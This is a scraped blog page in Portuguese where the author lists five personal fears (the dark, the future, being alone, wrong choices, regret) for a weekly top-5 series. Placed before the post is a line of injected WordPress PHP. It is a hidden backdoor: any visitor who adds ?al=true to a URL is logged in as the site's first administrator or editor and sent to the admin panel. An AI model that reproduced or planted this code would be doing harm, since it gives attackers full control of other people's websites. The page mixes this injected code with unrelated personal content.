// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Semana 33: Medo • A Menina da Janela

52 weeksmúsica

20 de fevereiro de 2014
(Página 200 de A menina que roubava livros)

“…Só tememos por nós mesmos ou por aqueles que amamos…
Homem que nada teme é homem que nada ama…”
Isso mesmo pessoal, o tema do top 5 de hoje é MEDO. Acho difícil falar dos meus medos, mas vou tentar. Afinal, como diz o trecho da música da Pitty ali em cima, todos tememos algo porque todos amamos algo. Bora ver minhas respostas?

Semana 33: Tenho medo de…
1. Escuro: Tá, infantil? Sim. Mas só enfrento o escuro com alguém do meu lado ou enrolada em um cobertor. kkkk’
2. Do futuro: Isso ficou meio vago, mas tenho medo de que nada seja como eu quero/sonho.
3. Ficar sozinha: Não do tipo “medo de passar uma tarde/noite sozinha em casa”, mas de ficar sem amigos e companhia…
4. De fazer escolhas erradas
5. De um dia olhar pra trás e achar que nada valeu a pena ou que fiz tudo errado
Esses são meus maiores medos pessoal, e os medos de vocês, quais são?
Deixo vocês com a música da qual tirei o trecho que iniciou o post!


Beijos, até a próxima!

Você também vai gostar

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Este site utiliza o Akismet para reduzir spam. Saiba como seus dados em comentários são processados.

8 Comments